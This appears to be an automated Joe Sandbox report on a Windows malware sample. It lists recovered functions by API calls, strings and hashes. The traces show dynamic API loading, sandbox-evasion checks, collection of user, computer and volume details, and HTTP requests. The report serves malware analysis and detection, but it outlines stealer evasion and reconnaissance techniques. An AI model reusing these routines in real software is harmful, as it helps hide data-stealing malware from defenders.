lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AD9
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AE0
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AE7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AEE
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AF5
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B0B
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B12
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B19
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B20
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B27
strlen.MSVCRT ref: 00404B2F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B53
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B5A
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B61
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B68
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B6F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B7F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B86
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B8D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B94
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B9B
VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00404BB0

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404A6F, 00404A76, 00404A7D, 00404A84, 00404A8B, 00404AAA, 00404AB4, 00404ABB, 00404AC2, 00404AC9, 00404AD0, 00404ADB, 00404AE2, 00404AE9, 00404AF0, 00404B06, 00404B0D, 00404B14, 00404B1B, 00404B22, 00404B43, 00404B55, 00404B5C, 00404B63, 00404B6A, 00404B7A, 00404B81, 00404B88, 00404B8F, 00404B96

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2127927946-3329630956
Opcode ID: f16473a37540a51901c5d734788aa638d0d129d2ef11d876a3004c0bbe0b3cfa
Instruction ID: 76e4e72d54844b5f718d0498cf6af46f704a1995843b300e33b80144487799f7
Opcode Fuzzy Hash: f16473a37540a51901c5d734788aa638d0d129d2ef11d876a3004c0bbe0b3cfa
Instruction Fuzzy Hash: 3431E7A0B4021C7686306BB56C4AFEF7E5CDFCC752F215253F51856181C9B86581CEFA

Function 004265A0 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76210000,00901180), ref: 004265F9
GetProcAddress.KERNEL32(76210000,009010F0), ref: 00426612
GetProcAddress.KERNEL32(76210000,009011B0), ref: 0042662A
GetProcAddress.KERNEL32(76210000,00901138), ref: 00426642
GetProcAddress.KERNEL32(76210000,00909130), ref: 0042665B
GetProcAddress.KERNEL32(76210000,00906830), ref: 00426673
GetProcAddress.KERNEL32(76210000,00906590), ref: 0042668B
GetProcAddress.KERNEL32(76210000,009012E8), ref: 004266A4
GetProcAddress.KERNEL32(76210000,00901030), ref: 004266BC
GetProcAddress.KERNEL32(76210000,00901090), ref: 004266D4
GetProcAddress.KERNEL32(76210000,00901198), ref: 004266ED
GetProcAddress.KERNEL32(76210000,00906810), ref: 00426705
GetProcAddress.KERNEL32(76210000,00901240), ref: 0042671D
GetProcAddress.KERNEL32(76210000,009011F8), ref: 00426736
GetProcAddress.KERNEL32(76210000,009066D0), ref: 0042674E
GetProcAddress.KERNEL32(76210000,009010A8), ref: 00426766
GetProcAddress.KERNEL32(76210000,00909450), ref: 0042677F
GetProcAddress.KERNEL32(76210000,009066B0), ref: 00426797
GetProcAddress.KERNEL32(76210000,00909438), ref: 004267AF
GetProcAddress.KERNEL32(76210000,00906710), ref: 004267C8
LoadLibraryA.KERNEL32(00909480,?,?,?,00421DD3), ref: 004267D9
LoadLibraryA.KERNEL32(009093A8,?,?,?,00421DD3), ref: 004267EB
LoadLibraryA.KERNEL32(00909600,?,?,?,00421DD3), ref: 004267FD
LoadLibraryA.KERNEL32(009093C0,?,?,?,00421DD3), ref: 0042680E
LoadLibraryA.KERNEL32(009095D0,?,?,?,00421DD3), ref: 00426820
GetProcAddress.KERNEL32(75B30000,009094C8), ref: 0042683D
GetProcAddress.KERNEL32(751E0000,009093D8), ref: 00426859
GetProcAddress.KERNEL32(751E0000,00909630), ref: 00426871
GetProcAddress.KERNEL32(76910000,00909468), ref: 0042688D
GetProcAddress.KERNEL32(75670000,009067F0), ref: 004268A9
GetProcAddress.KERNEL32(77310000,00908FD0), ref: 004268C5
GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 004268DC

Strings

NtQueryInformationProcess, xrefs: 004268D1

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 679f949250fc69e3c6c948a61fb191331c2934ca864fe0a6fb2186dc54d65b5c
Instruction ID: 143a59b63f5ba91877edf66354a2a7fa555e43081a608b4dc5d23feccb8ab71c
Opcode Fuzzy Hash: 679f949250fc69e3c6c948a61fb191331c2934ca864fe0a6fb2186dc54d65b5c
Instruction Fuzzy Hash: CEA15DB9A117009FD758DF65EE88A6637BBF789344300A51EF94683360DBB4A900DFB0

Function 00406C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00406C6F
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00406CC2
InternetOpenA.WININET(0042CFF4,00000001,00000000,00000000,00000000), ref: 00406CD5
StrCmpCA.SHLWAPI(?,00912100), ref: 00406CED
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406D15
HttpOpenRequestA.WININET(00000000,GET,?,00911908,00000000,00000000,-00400100,00000000), ref: 00406D50
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406D77
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406D86
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406DA5
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00406DFF
lstrcpy.KERNEL32(00000000,?), ref: 00406E5B
InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00406E7D
InternetCloseHandle.WININET(00000000), ref: 00406E8E
InternetCloseHandle.WININET(?), ref: 00406E98
InternetCloseHandle.WININET(00000000), ref: 00406EA2
lstrcpy.KERNEL32(00000000,00000000), ref: 00406EC3

Strings

GET, xrefs: 00406D4A
ERROR, xrefs: 00406DB2

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
String ID: ERROR$GET
API String ID: 3687753495-3591763792
Opcode ID: a881f4ca64f4ed89898151efb8fda986a64cb6f86c5300304a89a309ab057b8a
Instruction ID: 8a907297e25ef71cd4293b5d859979f41ab2109233d0e0d0d40ab909daed6b9d
Opcode Fuzzy Hash: a881f4ca64f4ed89898151efb8fda986a64cb6f86c5300304a89a309ab057b8a
Instruction Fuzzy Hash: 3A816F71B01315ABEB20DFA4DC89BAF77B5AF44700F154069F905B72C0DBB8AD058BA8

Function 00421DC0 Relevance: 13.6, APIs: 9, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: b7df213417092e843da0a48d84c8aeb55ed900a7355b06edfc84b0ca494666af
Instruction ID: 99c442af194c17dcdf968dcb4d09652326eda7df30839eed1b73e61910dd0112
Opcode Fuzzy Hash: b7df213417092e843da0a48d84c8aeb55ed900a7355b06edfc84b0ca494666af
Instruction Fuzzy Hash: B74173317003169FC720AFA5ED49B9F76A6AF14754F85003AF901A72E1DF78E905CB98

Function 00422C10 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00422C3F
HeapAlloc.KERNEL32(00000000), ref: 00422C46
GetUserNameA.ADVAPI32(00000000,00000104), ref: 00422C5A

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: fa738ee861b1d682c4ad799a473bde607761e807e886556c509f5aa502afa864
Instruction ID: eafcfd8408abf31dcdc5f7efa7efe72b9a9e0bda40d3ebfab19b25c76b2a2745
Opcode Fuzzy Hash: fa738ee861b1d682c4ad799a473bde607761e807e886556c509f5aa502afa864
Instruction Fuzzy Hash: B2F054B1A44614AFD710DF98DD49B9ABBBCF744B61F10021AF915E3680D7B419048BE1

Function 0041F390 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0042CFF4,00000001,00000000,00000000), ref: 0041F3B5
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0041F3D1
lstrlenA.KERNEL32(0042CFF4), ref: 0041F3DC
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0041F3F5
lstrlenA.KERNEL32(0042CFF4), ref: 0041F400
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0041F419
lstrcpy.KERNEL32(00000000,00434FA4), ref: 0041F43E
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0041F46C
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0041F4A0
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0041F4D0
lstrlenA.KERNEL32(00906750), ref: 0041F4F5

Strings

ERROR, xrefs: 0041F7F6, 0041F8F2, 0041FB7E, 0041FC0C, 0041FE98, 0041FF30

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: ERROR
API String ID: 367037083-2861137601
Opcode ID: ee959150b8ca82184097f696f3e4b8bf5b314230d02e80adf3a33ad970b4393c
Instruction ID: 04ec9f6585fcfa106025b6c4ba3809cb0dc593abf6aadc432b34e349534a5bb0
Opcode Fuzzy Hash: ee959150b8ca82184097f696f3e4b8bf5b314230d02e80adf3a33ad970b4393c
Instruction Fuzzy Hash: 8CA24270A012059FDB20DF69D948A9AB7F5AF44314F18807BE409EB3A1DB79DC86CF94

Function 00418DF0 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 174
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpCA.SHLWAPI(?,block,?,00000000,?,?,0042096B), ref: 00418E0A
ExitProcess.KERNEL32 ref: 00418E17
strtok_s.MSVCRT ref: 00418E29

Strings

block, xrefs: 00418DFB
kB, xrefs: 00418E24, 00418E27

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block$kB
API String ID: 3407564107-744917121
Opcode ID: 484a683089b7149ae5160f9ca9c77c0b13d70eba21a03f55dbc2cbcbe8b42cbe
Instruction ID: c664b752f4f443f94eea8978a0da08ed5d28104f4255e9da6096bc8cc9db7343
Opcode Fuzzy Hash: 484a683089b7149ae5160f9ca9c77c0b13d70eba21a03f55dbc2cbcbe8b42cbe
Instruction Fuzzy Hash: B3515C70A047019FC7319F65DD88AAB7BF4AB48704B20582EE442D7650DBBCE9819F69

Function 00422910 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 93
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,00909510,00000000), ref: 0042294B
GetVolumeInformationA.KERNEL32(0042A650,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 0042297C
GetProcessHeap.KERNEL32(00000000,00000104), ref: 004229DF
HeapAlloc.KERNEL32(00000000), ref: 004229E6
wsprintfA.USER32 ref: 00422A0B

Strings

C, xrefs: 00422955
-B, xrefs: 00422A32
:\, xrefs: 00422965

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowswsprintf
String ID: -B$:\$C
API String ID: 1325379522-1437955
Opcode ID: 013d7a5abd80eb44982cec66597c927420344f608520c3a884e76de014233dcd
Instruction ID: 562ad2215438343aebe80b64a3c577c541e91a378324e6c4921a498218fa886a
Opcode Fuzzy Hash: 013d7a5abd80eb44982cec66597c927420344f608520c3a884e76de014233dcd
Instruction Fuzzy Hash: D331A5B1E08219AFC714DFB89A44AEFBFB8EB18340F00016AE505E7650E2748A408BA5

Function 0081003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0081024D

Strings

kernel32.dll, xrefs: 0081008F, 00810095
cess, xrefs: 0081018D

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: f6093475901ca60e80cc3f331bc2662dae69c62b94434f60525690b1d0a0d3c1
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 9F526874A012299FDB64CF58C984BA8BBB5BF09304F1480E9E94DAB251DB70AEC4DF15

Function 00404BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000800,00909110), ref: 00404BF7
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404C01
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404C0B
lstrlenA.KERNEL32(?,00000000,?), ref: 00404C1F
InternetCrackUrlA.WININET(?,00000000), ref: 00404C27

Strings

<, xrefs: 00404BE7

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: 6a9c956af9aa3062bf888cd7a1893461fa982ef6916ec0cf82dedcf435012787
Instruction ID: 1bd60353331dbecd9a7383d9733d23d0053dd466cc4828cfdfd0774d9622719e
Opcode Fuzzy Hash: 6a9c956af9aa3062bf888cd7a1893461fa982ef6916ec0cf82dedcf435012787
Instruction Fuzzy Hash: D8012D71D00218AFDB10DFA9EC45B9EBBB8EB48364F00412AF914E7390EB7459058FD4

Function 00401030 Relevance: 7.6, APIs: 5, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,00000000,00000000,?,?,00421E5A), ref: 00401046
VirtualAllocExNuma.KERNEL32(00000000,?,?,00421E5A), ref: 0040104D
ExitProcess.KERNEL32 ref: 00401058
VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,00421E5A), ref: 0040106C
VirtualFree.KERNEL32(00000000,17C841C0,00008000,?,?,00421E5A), ref: 004010AB

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma
String ID:
API String ID: 3477276466-0
Opcode ID: eebbf2a7d8a8f00017b338c7aa3164428bececb1a666839850d6e3d3436eabea
Instruction ID: aa33e4c314b55322e5f005f032d3d73aad5dab283e8b13059c6bb542b9569755
Opcode Fuzzy Hash: eebbf2a7d8a8f00017b338c7aa3164428bececb1a666839850d6e3d3436eabea
Instruction Fuzzy Hash: 5E0144713403047BE7240A656C1AF6B77AEA781B01F209029F744F33D0DAB1EA008AB8

Function 0041F070 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0041F0A3
StrCmpCA.SHLWAPI(?,ERROR,?,?,?,?,?,?,?,?,?,0041F5C8), ref: 0041F0BE
lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F11F

Strings

ERROR, xrefs: 0041F0B8, 0041F119

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: ERROR
API String ID: 3722407311-2861137601
Opcode ID: 56404c45ebb530a39d46f474edf82050ec212050ea1fd6d48b9b1043bf2b57c1
Instruction ID: 2f8a9757f64988c9f480c6ae0c275d0c92c3e801e747b2960019797ab098cc34
Opcode Fuzzy Hash: 56404c45ebb530a39d46f474edf82050ec212050ea1fd6d48b9b1043bf2b57c1
Instruction Fuzzy Hash: 152137707101069BCB21FF79DD4969B37A4AF54304F10543AB84AEB2D2DE78DC598B98

Function 004010C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 004010EA
ExitProcess.KERNEL32 ref: 00401114

Strings

@, xrefs: 004010E2

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 803317263-2766056989
Opcode ID: f127fba7727a91b88187df4bdea323de0718f2841fffded282c9bdb05d23b48c
Instruction ID: 822a68ba0681b22967503a2222785f0e102d58cfae2bd9798b899adfc8918474
Opcode Fuzzy Hash: f127fba7727a91b88187df4bdea323de0718f2841fffded282c9bdb05d23b48c
Instruction Fuzzy Hash: A8F027701082444BEB186A64DD4A32EF7D9EB46350F10493BEEDAE72E2E278C840857F

Function 00422CA0 Relevance: 4.5, APIs: 3, Instructions: 44
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00422CCF
HeapAlloc.KERNEL32(00000000), ref: 00422CD6
GetComputerNameA.KERNEL32(00000000,00000104), ref: 00422CEA

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
